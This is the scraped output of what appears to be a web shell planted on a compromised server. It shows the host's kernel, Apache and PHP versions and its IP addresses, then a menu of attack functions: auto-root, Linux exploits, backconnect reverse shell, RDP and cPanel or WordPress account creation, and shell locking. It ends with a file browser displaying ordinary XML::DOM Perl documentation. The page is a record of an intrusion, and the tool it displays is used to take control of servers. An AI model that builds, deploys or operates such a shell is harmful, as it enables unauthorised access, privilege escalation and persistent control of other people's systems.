Linux server.kiran-academy.com 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips
: 194.233.91.196 | : 216.73.216.216
Cant Read [ /etc/named.conf ]
7.4.32
finalho
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
vendor_perl /
XML /
DOM /
[ HOME SHELL ]
Name
Size
Permission
Action
AttDef.pod
662
B
-rw-r--r--
AttlistDecl.pod
1.16
KB
-rw-r--r--
Attr.pod
2.63
KB
-rw-r--r--
CDATASection.pod
1.23
KB
-rw-r--r--
CharacterData.pod
2.75
KB
-rw-r--r--
Comment.pod
438
B
-rw-r--r--
DOMException.pm
1.85
KB
-rw-r--r--
DOMImplementation.pod
665
B
-rw-r--r--
Document.pod
5.52
KB
-rw-r--r--
DocumentFragment.pod
2.03
KB
-rw-r--r--
DocumentType.pod
4.99
KB
-rw-r--r--
Element.pod
4.83
KB
-rw-r--r--
ElementDecl.pod
529
B
-rw-r--r--
Entity.pod
1.07
KB
-rw-r--r--
EntityReference.pod
1.27
KB
-rw-r--r--
NamedNodeMap.pm
5.19
KB
-rw-r--r--
NamedNodeMap.pod
3.56
KB
-rw-r--r--
Node.pod
12.77
KB
-rw-r--r--
NodeList.pm
695
B
-rw-r--r--
NodeList.pod
1.07
KB
-rw-r--r--
Notation.pod
874
B
-rw-r--r--
Parser.pod
2.65
KB
-rw-r--r--
PerlSAX.pm
940
B
-rw-r--r--
ProcessingInstruction.pod
802
B
-rw-r--r--
Text.pod
1.84
KB
-rw-r--r--
XMLDecl.pod
686
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Entity.pod
=head1 NAME XML::DOM::Entity - An XML ENTITY in XML::DOM =head1 DESCRIPTION XML::DOM::Entity extends L<XML::DOM::Node>. This node represents an Entity declaration, e.g. <!ENTITY % draft 'INCLUDE'> <!ENTITY hatch-pic SYSTEM "../grafix/OpenHatch.gif" NDATA gif> The first one is called a parameter entity and is referenced like this: %draft; The 2nd is a (regular) entity and is referenced like this: &hatch-pic; =head2 METHODS =over 4 =item getNotationName Returns the name of the notation for the entity. I<Not Implemented> The DOM Spec says: For unparsed entities, the name of the notation for the entity. For parsed entities, this is null. (This implementation does not support unparsed entities.) =item getSysId Returns the system id, or undef. =item getPubId Returns the public id, or undef. =back =head2 Additional methods not in the DOM Spec =over 4 =item isParameterEntity Whether it is a parameter entity (%ent;) or not (&ent;) =item getValue Returns the entity value. =item getNdata Returns the NDATA declaration (for general unparsed entities), or undef. =back
Close